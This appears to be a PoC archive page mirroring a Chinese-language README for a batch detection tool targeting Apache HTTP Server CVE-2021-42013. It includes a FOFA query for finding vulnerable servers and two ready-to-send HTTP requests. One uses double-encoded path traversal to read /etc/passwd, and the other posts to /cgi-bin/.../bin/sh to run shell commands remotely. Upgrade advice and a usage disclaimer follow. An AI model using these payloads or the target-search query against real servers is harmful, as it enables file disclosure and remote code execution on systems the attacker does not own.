Associated Vulnerability
Title:Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013)Description:It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.
Description
Apache 远程代码执行 (CVE-2021-42013)批量检测工具:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。
Readme
## 漏洞名称
Apache 远程代码执行 (CVE-2021-42013)
## 漏洞描述
Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。
## 影响范围
Apache HTTP Server 2.4.49
Apache HTTP Server 2.4.50
## FOFA语法
server="Apache/2.4.49" || server="Apache/2.4.50"
## 使用方法
```
1.将准备检测的IP地址放入ip.txt文件中
2.运行python3 check.py
```
<img width="950" alt="image" src="https://user-images.githubusercontent.com/67818638/147252090-6f534824-105c-4037-99e8-108f1a934d57.png">
## POC
```plain
GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
```
<img width="1050" alt="image" src="https://user-images.githubusercontent.com/67818638/147256883-28480e19-a5a5-4ab0-97d8-24f61149634f.png">
## EXP
```plain
GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
Content-Length: 57
echo Content-Type: text/plain; echo;ls /
```
## 修复建议
目前这些漏洞已经修复,鉴于漏洞的严重性,建议受影响的用户立即升级更新到Apache HTTP Server 2.4.51(已于10月7日发布)或更高版本。
下载链接:
https://httpd.apache.org/download.cgi#apache24
## 注意事项
本工具仅提供给安全测试人员进行安全自查使用 用户滥用造成的一切后果与作者无关 使用者请务必遵守当地法律 本程序不得用于商业用途,仅限学习交流
<img width="318" alt="147206848-6090876d-d029-4ffd-a6a8-ee4600071404" src="https://user-images.githubusercontent.com/67818638/147253699-8293a6b3-9a6f-4613-816b-aef03b26737b.png">
File Snapshot
[4.0K] /data/pocs/6d521949a0ed02a595736354345ba81716f18955
├── [4.8K] check.py
├── [ 24] ip.txt
└── [3.2K] README.md
0 directories, 3 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →